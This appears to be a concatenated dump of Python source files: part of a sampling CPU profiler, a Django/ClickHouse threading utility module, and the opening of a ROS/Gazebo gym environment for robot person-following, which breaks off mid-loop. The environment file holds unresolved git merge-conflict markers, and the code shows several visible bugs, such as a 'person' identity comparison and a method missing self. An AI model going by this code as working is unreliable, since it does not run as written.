pthread_getcpuclockid.restype = clockid_t
# wrap clock_gettime()
clock_gettime = libc.clock_gettime
clock_gettime.argtypes = [clockid_t, ctypes.POINTER(timespec)]
clock_gettime.restype = ctypes.c_int
def get_current_thread_id():
return pthread_self()
def get_thread_cpu_time(thread_id=None):
if thread_id is None:
thread_id = pthread_self()
# First, get the thread's CPU clock ID
clock_id = clockid_t()
error = pthread_getcpuclockid(thread_id, ctypes.pointer(clock_id))
if error:
return None
# Now get time from clock...
result = timespec()
error = clock_gettime(clock_id, ctypes.pointer(result))
if error:
return None
cpu_time = result.tv_sec + result.tv_nsec * NANOSEC
return cpu_time
self._get_current_thread_id = get_current_thread_id
self._get_thread_cpu_time = get_thread_cpu_time
def get_current_thread_id(self):
return self._get_current_thread_id()
def get_thread_cpu_time(thread_id=None):
return self._get_thread_cpu_time(thread_id)
import sys
if sys.platform == 'darwin':
thread_platform = MacPThreadPlatform()
elif sys.platform == 'linux':
thread_platform = LinuxPThreadPlatform()
# TODO: Windows support
else:
try:
import thread
except ImportError:
pass
else:
import warnings
warnings.warn('Multi-threaded CPU times not supported on this platform!')
thread_platform = SingleThreadedPlatform()
# - Sample data ----------------------------------------------------------------
import collections
StackLine = collections.namedtuple('StackLine', ['type', 'name', 'file', 'line', 'data'])
def stack_line_from_frame(frame, stype='func', data=None):
code = frame.f_code
return StackLine(stype, code.co_name, code.co_filename, code.co_firstlineno, data)
class SampleData(object):
__slots__ = ['rtime', 'cputime', 'ticks']
def __init__(self):
self.rtime = 0.0 # Real / wall-clock time
self.cputime = 0.0 # User CPU time (single thread)
self.ticks = 0 # Actual number of samples
def __str__(self):
return 'SampleData<r=%.3f, cpu=%.3f, t=%d>' % (
self.rtime,
self.cputime,
self.ticks
)
def __repr__(self):
return str(self)
class RawProfileData(object):
def __init__(self):
self.stack_line_id_map = {} # Maps StackLines to IDs
self.stack_tuple_id_map = {} # Map tuples of StackLine IDs to IDs
self.stack_data = {} # Maps stack ID tuples to SampleData
self.time_running = 0.0 # Total amount of time sampling has been active
self.total_ticks = 0 # Total number of samples we've taken
def add_sample_data(self, stack_list, rtime, cputime, ticks):
sm = self.stack_line_id_map
sd = self.stack_line_id_map.setdefault
stack_tuple = tuple(
sd(stack_line, len(sm))
for stack_line in stack_list
)
stack_tuple_id = self.stack_tuple_id_map.setdefault(
stack_tuple,
len(self.stack_tuple_id_map),
)
if stack_tuple_id in self.stack_data:
sample_data = self.stack_data[stack_tuple_id]
else:
sample_data = self.stack_data[stack_tuple_id] = SampleData()
sample_data.rtime += rtime
sample_data.cputime += cputime
sample_data.ticks += ticks
self.total_ticks += ticks
def dump(self, sort='rtime'):
assert sort in SampleData.__slots__
# Quick util function to dump raw data in a vaguely-useful format
# TODO: replace with proper text exporter with sort parameters, etc.
print '%s:\n\n %d samples taken in %.3fs:\n' % (
self.__class__.__name__,
self.total_ticks,
self.time_running,
)
print ' Ordered by: %s\n' % sort
# Invert stack -> ID map
stack_line_map = dict([
(v, k)
for k, v
in self.stack_line_id_map.items()
])
stack_map = dict([
(v, k)
for k, v
in self.stack_tuple_id_map.items()
])
lines = [
(getattr(sample_data, sort), stack_id, sample_data)
for stack_id, sample_data
in self.stack_data.items()
]
lines.sort()
lines.reverse()
print ' ticks rtime cputime filename:lineno(function)'
for _, stack_id, sample_data in lines:
stack = stack_map[stack_id]
stack_line = stack_line_map[stack[0]]
print ' %7d % 8.3f % 8.3f %s:%d(%s) : %r' % (
sample_data.ticks,
sample_data.rtime,
sample_data.cputime,
os.path.basename(stack_line.file),
stack_line.line,
stack_line.name,
stack,
)
print
class ThreadClock(object):
__slots__ = ['rtime', 'cputime']
def __init__(self):
self.rtime = 0.0
self.cputime = 0.0
class Profiler(object):
_scheduler_map = {
'signal':SignalIntervalScheduler,
'thread':ThreadIntervalScheduler
}
def __init__(
self,
scheduler_type='signal', # Which scheduler to use
collect_stacks=True, # Collect full call-tree data?
rate=None,
stochastic=False,
):
self.collect_stacks = collect_stacks
assert (
scheduler_type in self._scheduler_map
or isinstance(scheduler_type, IntervalScheduler)
), 'Unknown scheduler type'
self.scheduler_type = scheduler_type
if isinstance(scheduler_type, str):
scheduler_type = self._scheduler_map[scheduler_type]
if rate is None:
rate = scheduler_type.default_rate
self._scheduler = scheduler_type(
self.sample,
interval=1.0/rate,
stochastic=stochastic,
)
self.reset()
def reset(self):
self._profile_data = RawProfileData()
self._thread_clocks = {} # Maps from thread ID to ThreadClock
self._last_tick = 0
self.total_samples = 0
self.sampling_time = 0.0
self._empty_stack = [StackLine(None, 'null', '', 0, None)]
self._start_time = 0.0
def sample(self, _interrupted_frame=None):
sample_time = time.time()
current_frames = sys._current_frames()
current_thread = thread.get_ident()
for thread_ident, frame in current_frames.items():
if thread_ident == current_thread:
frame = _interrupted_frame
if frame is not None:
# 1.7 %
stack = [stack_line_from_frame(frame)]
if self.collect_stacks:
frame = frame.f_back
while frame is not None:
stack.append(stack_line_from_frame(frame))
frame = frame.f_back
stack.append(StackLine('thread', str(thread_ident), '', 0, None)) # todo: include thread name?
# todo: include PID?
# todo: include custom metadata/labels?
# 2.0 %
if thread_ident in self._thread_clocks:
thread_clock = self._thread_clocks[thread_ident]
cputime = thread_platform.get_thread_cpu_time(thread_ident)
else:
thread_clock = self._thread_clocks[thread_ident] = ThreadClock()
cputime = thread_platform.get_thread_cpu_time(thread_ident)
# ~5.5%
self._profile_data.add_sample_data(
stack,
sample_time - self.last_tick,
cputime - thread_clock.cputime,
1
)
thread_clock.cputime = cputime
else:
self._profile_data.add_sample_data(
self._empty_stack, sample_time - self.last_tick, 0.0, 1
)
self.last_tick = sample_time
self.total_samples += 1
self.sampling_time += time.time() - sample_time
def start(self):
import threading
# reset thread clocks...
self._thread_clocks = {}
for thread in threading.enumerate():
thread_clock = ThreadClock()
self._thread_clocks[thread.ident] = thread_clock
cputime = thread_platform.get_thread_cpu_time(thread.ident)
thread_clock.cputime = cputime
self._start_time = self.last_tick = time.time()
self._scheduler.start()
@contextmanager
def activated(self):
try:
self.start()
yield self
finally:
self.stop()
def stop(self):
self._scheduler.stop()
self._profile_data.time_running += time.time() - self._start_time
self._start_time = 0.0
def busy(rate=100):
import time
profiler = Profiler(rate=rate)
with profiler.activated():
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
return profiler
|
utils.py | import datetime
from queue import Queue, Empty
from threading import Thread
import os
from itertools import chain
from typing import Union, Any, Optional, TypeVar, Set, Dict, Iterable, Tuple, Iterator, Callable, List
import pytz
import six
from importlib import import_module
from importlib.util import find_spec
from django.db.models import Model as DjangoModel
from .database import connections
T = TypeVar('T')
def get_tz_offset(db_alias: Optional[str] = None) -> int:
"""
Returns ClickHouse server timezone offset in minutes
:param db_alias: The database alias used
:return: Integer
"""
db = connections[db_alias]
return int(db.server_timezone.utcoffset(datetime.datetime.utcnow()).total_seconds() / 60)
def format_datetime(dt: Union[datetime.date, datetime.datetime], timezone_offset: int = 0, day_end: bool = False,
db_alias: Optional[str] = None) -> str:
"""
Formats datetime and date objects to format that can be used in WHERE conditions of query
:param dt: datetime.datetime or datetime.date object
:param timezone_offset: timezone offset (minutes)
:param day_end: If datetime.date is given and flag is set, returns day end time, not day start.
:param db_alias: The database alias used
:return: A string representing datetime
"""
assert isinstance(dt, (datetime.datetime, datetime.date)), "dt must be datetime.datetime instance"
assert type(timezone_offset) is int, "timezone_offset must be integer"
# datetime.datetime inherits datetime.date. So I can't just make isinstance(dt, datetime.date)
if not isinstance(dt, datetime.datetime):
t = datetime.time.max if day_end else datetime.time.min
dt = datetime.datetime.combine(dt, t)
# Convert datetime to UTC, if it has timezone
if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
dt = pytz.utc.localize(dt)
else:
dt = dt.astimezone(pytz.utc)
# Dates in ClickHouse are parsed in server local timezone. So I need to add server timezone
server_dt = dt - datetime.timedelta(minutes=timezone_offset - get_tz_offset(db_alias))
return server_dt.strftime("%Y-%m-%d %H:%M:%S")
def module_exists(module_name: str) -> bool:
"""
Checks if module exists
:param module_name: Dot-separated module name
:return: Boolean
"""
# Python 3.4+
spam_spec = find_spec(module_name)
return spam_spec is not None
def lazy_class_import(obj: Union[str, Any]) -> Any:
"""
If string is given, imports object by given module path.
Otherwise returns the object
:param obj: A string class path or object to return
:return: Imported object
"""
if isinstance(obj, six.string_types):
module_name, obj_name = obj.rsplit('.', 1)
module = import_module(module_name)
try:
return getattr(module, obj_name)
except AttributeError:
raise ImportError('Invalid import path `%s`' % obj)
else:
return obj
def get_subclasses(cls: T, recursive: bool = False) -> Set[T]:
"""
Gets all subclasses of given class
Attention!!! Classes would be found only if they were imported before using this function
:param cls: Class to get subcalsses
:param recursive: If flag is set, returns subclasses of subclasses and so on too
:return: A list of subclasses
"""
subclasses = set(cls.__subclasses__())
if recursive:
for subcls in subclasses.copy():
subclasses.update(get_subclasses(subcls, recursive=True))
return subclasses
def model_to_dict(instance: DjangoModel, fields: Optional[Iterable[str]] = None,
exclude_fields: Optional[Iterable[str]] = None) -> Dict[str, Any]:
"""
Standard model_to_dict ignores some fields if they have invalid naming
:param instance: Object to convert to dictionary
:param fields: Field list to extract from instance
:param exclude_fields: Filed list to exclude from extraction
:return: Serialized dictionary
"""
data = {}
if not fields:
opts = instance._meta
fields = {f.name for f in chain(opts.concrete_fields, opts.private_fields, opts.many_to_many)}
for name in set(fields) - set(exclude_fields or set()):
val = getattr(instance, name, None)
if val is not None:
data[name] = val
return data
def check_pid(pid):
"""
Check For the existence of a unix pid.
"""
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
def int_ranges(items: Iterable[int]) -> Iterator[Tuple[int, int]]:
"""
Finds continuous intervals in integer iterable.
:param items: Items to search in
:return: Iterator over Tuple[start, end]
"""
interval_start = None
prev_item = None
for item in sorted(items):
if prev_item is None:
interval_start = prev_item = item
elif prev_item + 1 == item:
prev_item = item
else:
interval = interval_start, prev_item
interval_start = prev_item = item
yield interval
if interval_start is None:
return
else:
yield interval_start, prev_item
class ExceptionThread(Thread):
"""
Thread objects, which catches thread exceptions and raises them in main thread
"""
def __init__(self, *args, **kwargs):
super(ExceptionThread, self).__init__(*args, **kwargs)
self.exc = None
def _close_django_db_connections(self):
"""
In Django every thread has its own database connection pool.
But django does not close them automatically in child threads.
As a result, this can cause database connection leaking.
Here we close connections manually when thread execution is finished.
"""
try:
from django.db import connections as db_connections
except (ModuleNotFoundError, ImportError):
db_connections = None
if db_connections:
db_connections.close_all()
def run(self):
try:
return super(ExceptionThread, self).run()
except Exception as e:
self.exc = e
finally:
self._close_django_db_connections()
def join(self, timeout=None):
super(ExceptionThread, self).join(timeout=timeout)
if self.exc:
raise self.exc
def exec_in_parallel(func: Callable, args_queue: Queue, threads_count: Optional[int] = None) -> List[Any]:
"""
Executes func in multiple threads in parallel
Functions are expected to be thread safe. If it needs some locks, func must provide them.
:param func: Function to execute in thread
:param args_queue: A queue with arguments for separate function call. Each element is tuple of (args, kwargs)
:param threads_count: Maximum number of parallel threads tho run
:return: A list of results. Order of results is not guaranteed. Element types depends func return type.
"""
results = []
# If thread_count is not given, we execute all tasks in parallel.
# If queue has less elements than threads_count, take queue size.
threads_count = min(args_queue.qsize(), threads_count) if threads_count else args_queue.qsize()
def _worker():
"""
Thread worker, gets next arguments from queue and processes them.
Results are put into results array using thread safe lock
:return: None
"""
finished = False
while not finished:
try:
# Get arguments
args, kwargs = args_queue.get_nowait()
# Execute function
local_res = func(*args, **kwargs)
# Write result. appending a list is thread safe operation according to:
# http://effbot.org/pyfaq/what-kinds-of-global-value-mutation-are-thread-safe.htm
results.append(local_res)
# Mark task as complete
args_queue.task_done()
except Empty:
# No data in queue, finish worker thread
finished = True
# Run threads
threads = []
for index in range(threads_count):
t = ExceptionThread(target=_worker)
threads.append(t)
t.start()
# Wait for threads to finish
for t in threads:
t.join()
return results
def exec_multi_arg_func(func: Callable, split_args: Iterable[Any], *args, threads_count: Optional[int] = None,
**kwargs) -> List[Any]:
"""
Executes function in parallel threads. Thread functions (func) receive one of split_args as first argument
Another arguments passed to functions - args and kwargs
If len(split_args) <= 0, separate threads are not run, main thread is used.
:param func: Function to execute. Must accept split_arg as first parameter
:param split_args: A list of arguments to split threads by
:param threads_count: Maximum number of threads to run in parallel
:return: A list of execution results. Order of execution is not guaranteed.
"""
split_args = list(split_args)
if len(split_args) == 0:
return []
elif len(split_args) == 1:
return [func(split_args[0], *args, **kwargs)]
else:
q = Queue()
for s in split_args:
q.put(([s] + list(args), kwargs))
return exec_in_parallel(func, q, threads_count=threads_count)
class SingletonMeta(type):
"""
Realises singleton pattern
"""
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs)
return cls._instances[cls] |
gym_gazeboros.py | #!/usr/bin/env python
from datetime import datetime
import copy
import traceback
import os, subprocess, time, signal
#from cv_bridge import CvBridge
import gym
import math
import random
# u
import numpy as np
import cv2 as cv
import rospy
# Brings in the SimpleActionClient
import actionlib
# Brings in the .action file and messages used by the move base action
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from squaternion import quat2euler
from squaternion import euler2quat
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Image
from gazebo_msgs.msg import ModelState
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import TransformStamped
from rosgraph_msgs.msg import Clock
from costmap_converter.msg import ObstacleArrayMsg
from costmap_converter.msg import ObstacleMsg
from gazebo_msgs.msg import ModelStates
<<<<<<< HEAD
from geometry_msgs.msg import Twist
=======
from geometry_msgs.msg import Twist, PoseStamped # PoseStamped added
>>>>>>> MCTS
from gazebo_msgs.srv import SetModelState
import threading
from gym.utils import seeding
import _thread
from squaternion import quat2euler
from squaternion import euler2quat
from simple_pid import PID
import pickle
import logging
logger = logging.getLogger(__name__)
class History():
def __init__(self, window_size, update_rate, save_rate=10):
self.idx = 0
self.update_rate = update_rate
self.save_rate = save_rate
self.lock = threading.Lock()
self.memory_size = int(math.ceil(save_rate/update_rate*window_size)+1)
self.data = [None for x in range(self.memory_size)]
self.prev_add_time = rospy.Time.now().to_sec() - 1
self.window_size = window_size
self.avg_frame_rate = None
self.time_data_= []
def add_element(self, element):
"""
element: the data that we put inside the history data array
"""
if abs(rospy.Time.now().to_sec() - self.prev_add_time) < 1./self.save_rate:
return
with self.lock:
self.idx = (self.idx + 1) % self.window_size
self.prev_add_time = rospy.Time.now().to_sec()
if self.data[self.idx] is None:
for idx in range(self.memory_size):
self.data[idx] = element
self.data[self.idx] = element
if not len(self.time_data_) > 50:
self.time_data_.append(self.prev_add_time)
if len(self.time_data_) > 3:
prev_t = self.time_data_[0]
time_intervals = []
for t in self.time_data_[1:]:
time_intervals.append(t - prev_t)
prev_t = t
self.avg_frame_rate = 1.0 / np.average(time_intervals)
def get_elemets(self):
return_data = []
while self.avg_frame_rate is None:
time.sleep(0.1)
skip_frames = -int(math.ceil(self.avg_frame_rate / self.update_rate))
with self.lock:
index = self.idx #(self.idx - 1)% self.window_size
if self.window_size * abs(skip_frames) >= self.memory_size:
rospy.logerr("error in get element memory not enough update rate{} avg_frame_rate{} mem_size {} skipf: {}".format(self.update_rate, self.avg_frame_rate, self.memory_size, skip_frames))
for i in range (self.window_size):
return_data.append(self.data[index])
index = (index + skip_frames) % self.window_size
return return_data
def get_latest(self):
with self.lock:
return self.data[self.idx]
class Robot():
def __init__(self, name, max_angular_speed=1, max_linear_speed=1, relative=None, agent_num=None, use_goal=False, use_movebase=False, use_jackal=False, window_size=10, is_testing=False):
self.name = name
self.use_jackal = use_jackal
self.init_node = False
self.alive = True
self.prev_call_gazeboros_ = None
if relative is None:
relative = self
self.relative = relative
self.is_testing = is_testing
if self.is_testing:
self.all_pose_ = []
self.last_time_added = rospy.Time.now().to_sec()
self.log_history = []
self.agent_num = agent_num
self.init_node = True
self.deleted = False
self.update_rate_states = 2.0
self.window_size_history = window_size
self.current_vel_ = Twist()
self.goal = {"pos": None, "orientation": None}
self.use_goal = use_goal
self.use_movebase = use_movebase
self.max_angular_vel = max_angular_speed
self.max_linear_vel = max_linear_speed
self.max_rel_pos_range = 5.0 # meter
self.width_laserelement_image = 100
self.height_laser_image = 50
self.state_ = {'position': (None, None),
'orientation': None}
if self.use_jackal:
self.cmd_vel_pub = rospy.Publisher('/{}/jackal_velocity_controller/cmd_vel'.format(name), Twist, queue_size=1)
else:
self.cmd_vel_pub = rospy.Publisher('/{}/cmd_vel'.format(name), Twist, queue_size=1)
if "tb3" in self.name and self.use_movebase:
# Create an action client called "move_base" with action definition file "MoveBaseAction"
self.action_client_ = actionlib.SimpleActionClient('/move_base_{}'.format(self.agent_num),MoveBaseAction)
# Waits until the action server has started up and started listening for goals.
self.action_client_.wait_for_server(rospy.rostime.Duration(0.4))
else:
self.action_client_ = None
if "person" is self.name:
self.angular_pid = PID(0.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(1.0, 0, 0.05, setpoint=0)
else:
self.angular_pid = PID(2.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(2.5, 0, 0.05, setpoint=0)
self.pos_history = History(self.window_size_history, self.update_rate_states)
self.orientation_history = History(self.window_size_history, self.update_rate_states)
self.velocity_history = History(self.window_size_history, self.update_rate_states)
self.is_collided = False
self.is_pause = False
self.reset = False
self.scan_image = None
def calculate_ahead(self, distance):
x = self.state_['position'][0] + math.cos(self.state_["orientation"]) * distance
y = self.state_['position'][1] + math.sin(self.state_["orientation"]) * distance
return (x,y)
def movebase_cancel_goals(self):
self.action_client_.cancel_all_goals()
self.stop_robot()
def movebase_client_goal(self, goal_pos, goal_orientation):
# Creates a new goal with the MoveBaseGoal constructor
move_base_goal = MoveBaseGoal()
move_base_goal.target_pose.header.frame_id = "tb3_{}/odom".format(self.agent_num)
move_base_goal.target_pose.header.stamp = rospy.Time.now()
move_base_goal.target_pose.pose.position.x = goal_pos[0]
move_base_goal.target_pose.pose.position.y = goal_pos[1]
quaternion_rotation = euler2quat(0, goal_orientation, 0)
move_base_goal.target_pose.pose.orientation.x = quaternion_rotation[3]
move_base_goal.target_pose.pose.orientation.y = quaternion_rotation[1]
move_base_goal.target_pose.pose.orientation.z = quaternion_rotation[2]
move_base_goal.target_pose.pose.orientation.w = quaternion_rotation[0]
# Sends the move_base_goal to the action server.
self.action_client_.send_goal(move_base_goal)
# Waits for the server to finish performing the action.
#wait = self.action_client_.wait_for_result(rospy.rostime.Duration(0.4))
# If the result doesn't arrive, assume the Server is not available
# if not wait:
# rospy.logerr("Action server not available!")
# else:
# # Result of executing the action
# return self.action_client_.get_result()
def get_pos(self):
counter_problem = 0
while self.state_['position'] is None:
if self.reset:
return (None, None)
if counter_problem > 20:
rospy.logdebug("waiting for pos to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.001)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
return self.state_['position']
def get_orientation(self):
counter_problem = 0
while self.state_['orientation'] is None:
if self.reset:
return None
if counter_problem > 20:
rospy.logdebug("waiting for pos to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.001)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
return self.state_['orientation']
def is_current_state_ready(self):
return (self.state_['position'][0] is not None)
def is_observation_ready(self):
return (self.pos_history.avg_frame_rate is not None and\
self.orientation_history.avg_frame_rate is not None and\
self.velocity_history.avg_frame_rate is not None)
def update(self, init_pose):
self.alive = True
self.goal = {"pos": None, "orientation": None}
if "person" is self.name:
self.angular_pid = PID(0.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(1.0, 0, 0.05, setpoint=0)
else:
self.angular_pid = PID(2.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(2.5, 0, 0.05, setpoint=0)
self.pos_history = History(self.window_size_history, self.update_rate_states)
self.orientation_history = History(self.window_size_history, self.update_rate_states)
self.velocity_history = History(self.window_size_history, self.update_rate_states)
self.velocity_history.add_element((0,0))
self.pos_history.add_element((init_pose["pos"][0],init_pose["pos"][1]))
self.orientation_history.add_element(init_pose["orientation"])
self.log_history = []
if self.is_testing:
self.all_pose_ = []
#self.prev_call_gazeboros_ = None
#self.is_collided = False
self.is_pause = False
self.reset = False
def add_log(self, log):
self.log_history.append(log)
def remove(self):
self.reset = True
def set_state(self, state):
self.state_["position"] = state["position"]
self.state_["orientation"] = state["orientation"]
self.state_["velocity"] = state["velocity"]
self.orientation_history.add_element(state["orientation"])
self.pos_history.add_element(state["position"])
self.velocity_history.add_element(state["velocity"])
if self.is_testing and abs (rospy.Time.now().to_sec()- self.last_time_added) > 0.01:
self.all_pose_.append(self.state_.copy())
self.last_time_added = rospy.Time.now().to_sec()
def get_velocity(self):
return self.velocity_history.get_latest()
def pause(self):
self.is_pause = True
self.stop_robot()
def resume(self):
self.is_pause = False
def take_action(self, action):
if self.is_pause:
return
if self.use_goal:
pos = GazeborosEnv.denormalize(action[0:2], self.max_rel_pos_range)
pos_global = GazeborosEnv.get_global_position(pos, self.relative)
self.goal["orientation"] = self.get_orientation()
self.goal["pos"] = pos_global
if self.use_movebase:
#orientation = GazeborosEnv.denormalize(action[2], math.pi)
self.movebase_client_goal(pos_global, self.goal["orientation"])
else:
linear_vel = max(min(action[0]*self.max_linear_vel, self.max_linear_vel), -self.max_linear_vel)
angular_vel = max(min(action[1]*self.max_angular_vel, self.max_angular_vel), -self.max_angular_vel)
cmd_vel = Twist()
cmd_vel.linear.x = linear_vel #float(self.current_vel_.linear.x -(self.current_vel_.linear.x - linear_vel)*0.9)
cmd_vel.angular.z = angular_vel #-float(self.current_vel_.angular.z - (self.current_vel_.angular.z - angular_vel)*0.9)
self.current_vel_ = cmd_vel
self.cmd_vel_pub.publish(cmd_vel)
def stop_robot(self):
self.cmd_vel_pub.publish(Twist())
def angle_distance_to_point(self, pos):
current_pos = self.get_pos()
if current_pos[0] is None:
return None, None
angle = math.atan2(pos[1] - current_pos[1], pos[0] - current_pos[0])
distance = math.hypot(pos[0] - current_pos[0], pos[1] - current_pos[1])
angle = (angle - self.state_["orientation"] + math.pi) % (math.pi * 2) - math.pi
return angle, distance
def publish_cmd_vel(self, linear, angular):
cmd_vel = Twist()
angular_vel = min(max(angular, -self.max_angular_vel),self.max_angular_vel)
linear_vel = min(max(linear, 0), self.max_linear_vel)
cmd_vel.linear.x = float(linear_vel)
cmd_vel.angular.z = float(angular_vel)
self.cmd_vel_pub.publish(cmd_vel)
def use_selected_person_mod(self, person_mode):
while person_mode<=6:
if self.is_pause:
self.stop_robot()
return
if self.reset:
self.stop_robot()
return
angular_vel = 0
linear_vel = 0
if person_mode == 0:
linear_vel = self.max_linear_vel
if person_mode == 1:
#linear_vel = self.max_linear_vel * random.random()
linear_vel = self.max_linear_vel * 0.35
elif person_mode == 2:
linear_vel = self.max_linear_vel/2
angular_vel = self.max_angular_vel/6
elif person_mode == 3:
linear_vel = self.max_linear_vel/2
angular_vel = -self.max_angular_vel/6
elif person_mode == 4:
linear_vel, angular_vel = self.get_velocity()
linear_vel = linear_vel - (linear_vel - (random.random()/2 + 0.5))/2.
angular_vel = -self.max_angular_vel/6
elif person_mode == 5:
linear_vel, angular_vel = self.get_velocity()
linear_vel = linear_vel - (linear_vel - (random.random()/2 + 0.5))/2.
angular_vel = self.max_angular_vel/6
elif person_mode == 6:
linear_vel, angular_vel = self.get_velocity()
linear_vel = linear_vel - (linear_vel - (random.random()/2 + 0.5))/2.
angular_vel = angular_vel - (angular_vel - (random.random()-0.5)*2)/2.
self.publish_cmd_vel(linear_vel, angular_vel)
time.sleep(0.002)
def go_to_goal(self):
while True:
if self.reset:
return
while self.goal["pos"] is None:
time.sleep(0.1)
continue
diff_angle, distance = self.angle_distance_to_point(self.goal["pos"])
time_prev = rospy.Time.now().to_sec()
while not distance < 0.1 and abs(rospy.Time.now().to_sec() - time_prev) < 5:
if self.is_pause:
self.stop_robot()
return
if self.reset:
self.stop_robot()
return
diff_angle, distance = self.angle_distance_to_point(self.goal["pos"])
if distance is None:
return
if self.reset:
return
angular_vel = -min(max(self.angular_pid(diff_angle), -self.max_angular_vel),self.max_angular_vel)
linear_vel = min(max(self.linear_pid(-distance), 0), self.max_linear_vel)
linear_vel = linear_vel * math.pow((abs(math.pi - abs(diff_angle))/math.pi), 1.5)
self.publish_cmd_vel(linear_vel, angular_vel)
time.sleep(0.01)
self.stop_robot()
def go_to_pos(self, pos, stop_after_getting=False):
if self.is_pause:
self.stop_robot()
return
if self.reset:
return
diff_angle, distance = self.angle_distance_to_point(pos)
if distance is None:
print (self.get_pos())
return
time_prev = rospy.Time.now().to_sec()
while not distance < 0.2 and abs(rospy.Time.now().to_sec() - time_prev) < 5:
if self.is_pause:
self.stop_robot()
return
if self.reset:
return
diff_angle, distance = self.angle_distance_to_point(pos)
if distance is None:
return
if self.reset:
return
angular_vel = -min(max(self.angular_pid(diff_angle), -self.max_angular_vel),self.max_angular_vel)
linear_vel = min(max(self.linear_pid(-distance), 0), self.max_linear_vel)
linear_vel = linear_vel * math.pow((abs(math.pi - abs(diff_angle))/math.pi), 2)
self.publish_cmd_vel(linear_vel, angular_vel)
time.sleep(0.01)
if stop_after_getting:
self.stop_robot()
def get_goal(self):
counter_problem = 0
while self.goal["pos"] is None:
if self.reset:
return (None, None)
if counter_problem > 20:
rospy.logwarn("waiting for goal to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.01)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
# if not self.use_movebase:
# pos = GazeborosEnv.get_global_position(self.goal["pos"], self)
# goal = {"pos":pos, "orientation":None}
# else:
# goal = self.goal
return self.goal
def get_pos(self):
counter_problem = 0
while self.state_['position'] is None:
if self.reset:
return (None, None)
if counter_problem > 20:
rospy.logwarn("waiting for pos to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.01)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
return self.state_['position']
def get_laser_image(self):
return np.expand_dims(self.scan_image, axis=2)
class GazeborosEnv(gym.Env):
def __init__(self, is_evaluation=False):
self.is_evaluation_ = is_evaluation
# self.bridge = CvBridge()
# self.image_pub = rospy.Publisher("image_observation", Image)
# self.image_pub_gt = rospy.Publisher("image_observation_gt", Image)
self.is_reseting = True
self.use_path = True
self.use_jackal = True
self.lock = _thread.allocate_lock()
self.path_follower_test_settings = {0:(0,0, "straight",False), 1:(2,0, "right", False), 2:(3,0, "left", False),\
3:(1,4, "straight_Behind", False), 4:(2,3, "right_behind", False), 5:(3,3, "left_behind", False), 6:(7,2, "traj_1", True, True),\
7:(7, 12, "traj_2", True, True), 8:(7, 43, "traj_3", True),\
9:(2,1, "right_left", False), 10:(2,2, "right_right", False),\
11:(3,1, "left_left", False), 12:(3,2, "left_right", False)\
}
#self.path_follower_test_settings = {0:(7, 43, "traj_3", True)#(7,2, "traj_1", True, True), 1:(7, 12, "traj_2", True, True)}
self.is_testing = False
self.small_window_size = False
self.use_predifined_mode_person = True
self.use_goal = True
self.use_orientation_in_observation = True
self.collision_distance = 0.3
self.best_distance = 1.5
self.robot_mode = 0
self.window_size = 10
self.use_movebase = True
self.use_reachability = False
self.path_follower_current_setting_idx = 0
self.use_supervise_action = False
self.mode_person = 0
self.use_noise = True
self.is_use_test_setting = False
self.use_reverse = True
if self.small_window_size:
self.window_size = 5
if self.is_testing:
self.use_noise = False
self.use_reverse = False
self.is_use_test_setting = True
self.fallen = False
self.is_max_distance = False
self.use_random_around_person_ = False
self.max_mod_person_ = 7
self.wait_observation_ = 0
# being use for observation visualization
self.center_pos_ = (0, 0)
self.colors_visualization = cv.cvtColor(cv.applyColorMap(np.arange(0, 255, dtype=np.uint8), cv.COLORMAP_WINTER), cv.COLOR_BGR2RGB).reshape(255,3).tolist()
self.color_index = 0
self.first_call_observation = True
self.test_simulation_ = False
observation_dimentation = 46
if self.use_orientation_in_observation:
observation_dimentation += 1
if self.small_window_size:
observation_dimentation -= 20
self.observation_space = gym.spaces.Box(low=-1, high=1, shape=(observation_dimentation,))
self.current_obsevation_image_ = np.zeros([2000,2000,3])
self.current_obsevation_image_.fill(255)
self.prev_action = (0, 0)
self.action_space = gym.spaces.Box(low=np.array([-1.0, -1.0]), high=np.array([1.0, 1.0]), dtype=np.float32)
self.min_distance = 1
self.max_distance = 2.5
if self.test_simulation_ or self.is_evaluation_:
self.max_numb_steps = 80
elif self.is_use_test_setting:
self.max_numb_steps = 100
else:
self.max_numb_steps = 80
self.reward_range = [-1, 1]
self.reachabilit_value = None
if self.use_reachability:
with open('data/reachability.pkl', 'rb') as f:
self.reachabilit_value = pickle.load(f)
def get_test_path_number(self):
rospy.loginfo("current path idx: {}".format(self.path_follower_current_setting_idx))
return self.path_follower_test_settings[self.path_follower_current_setting_idx][2]
def use_test_setting(self):
self.is_use_test_setting = True
<<<<<<< HEAD
=======
>>>>>>> MCTS
def set_agent(self, agent_num):
try:
self.node = rospy.init_node('gym_gazeboros_{}'.format(agent_num))
except Exception as e:
rospy.logerr("probably already init in another node {}".format(e))
rospy.wait_for_service('/gazebo/set_model_state')
self.set_model_state_sp = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
date_time = datetime.now().strftime("%m_%d_%Y_%H_%M_%S")
self.agent_num = agent_num
self.obstacle_pub_ = rospy.Publisher('/move_base_node_{}/TebLocalPlannerROS/obstacles'.format(self.agent_num), ObstacleArrayMsg, queue_size=1)
self.create_robots()
self.path = {}
self.paths = []
self.log_file = None
try:
with open('data/person_trajectories_rl.pkl', 'rb') as f:
paths = pickle.load(f)
for path in paths:
angle_person = path['start_person']['orientation']
for angle in [x for x in range(0, 360, 10)]:
